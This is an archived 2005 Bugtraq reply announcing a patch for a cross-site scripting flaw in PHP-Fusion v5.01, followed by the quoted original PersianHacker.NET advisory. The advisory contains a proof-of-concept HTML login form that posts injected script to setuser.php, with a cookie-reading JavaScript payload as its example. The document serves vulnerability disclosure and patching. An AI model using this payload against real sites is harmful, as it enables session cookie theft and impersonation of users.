Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
Re: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
From: Sheldon King (sheldonfileblitz.com)
Date: Sat Mar 19 2005 - 15:38:51 CST
The main developer Digitanium was notified, a patch has been developed and released on the main website.
Quote from Main Developer Digitanium at http://www.php-fusion.co.uk
Pi3cH has reported a cross-site-scripting vulnerability. PHP-Fusion does not properly validate user-supplied input passed by the log-in form in 'user_info_panel.php'.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHP-Fusion software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. It's believed this is related to the new login system I plan to implement officially in v5.02, but have made available as a mod for v5.01. The details are not exact so I have added a security fix to v5.01 to close this vulnerability. I know this is must be annoying for everyone, especially as this is the 3rd security issue inside a month.
You must ensure that you update the file fusion_core.php, you can get the very latest file from the service pack which is available from the downloads area. The sourceforge files have also been updated. If you prefer to update manually please click Read More for details. Thanks to Pi3cH for the heads up.
PHP Fusion Beta Team
>Received: (qmail 6620 invoked from network); 19 Mar 2005 18:05:19 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (220.127.116.11)
> by mail.securityfocus.com with SMTP; 19 Mar 2005 18:05:19 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [18.104.22.168])
> by outgoing3.securityfocus.com (Postfix) with QMQP
> id 7C19E237330; Sat, 19 Mar 2005 10:49:48 -0700 (MST)
>Mailing-List: contact bugtraq-helpsecurityfocus.com; run by ezmlm
>Delivered-To: mailing list bugtraqsecurityfocus.com
>Delivered-To: moderator for bugtraqsecurityfocus.com
>Received: (qmail 3178 invoked from network); 19 Mar 2005 01:01:33 -0000
>Date: 19 Mar 2005 08:20:25 -0000
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: PersianHacker Team <pi3chyahoo.com>
>Subject: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection
>[PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
>Date: 2005 March
>Bug Number: 10
>a light-weight open-source content management system (CMS) written in PHP. It utilises a mySQL database to store your site content and includes a simple, comprehensive adminstration system. PHP-Fusion includes the most common features you would expect to see in many other CMS packages
>More info :
>The software does not properly validate user-supplied input in 'setuser.php'.
>A remote user can access the target user's cookies (including authentication cookies),
>if any, associated with the site running the PHP-Fusion software, access data
>recently submitted by the target user via web form to the site, or take actions
>on the site acting as the target user.
><title>PHP-Fusion v5.01 Exploit</title>
><h1>PHP-Fusion v5.01 Html Injection Exploit</h1>
><form method="POST" action="http://www.example.com/setuser.php">
> <b>XSS in register.php:</b><p>
> <input type="text" name="user_name" size="48" value="XSS Injection Code"></p>
> <input type="text" name="user_pass" size="48" value="XSS Injection Code"></p>
> <p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br>
> exmple: <script>document.write(document.cookie)</script></p>
> <p> <input type='submit' name='login' value='RUN!' class='button'></p>
><p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
>No solution was available at the time of this entry.
>Discovered by PersianHacker.NET Security Team
>by Pi3cH (pi3ch persianhacker net)
>Special Thanks: devil_box(for xss article), amectris, herbod.
>or mail me : pi3ch persianhacker net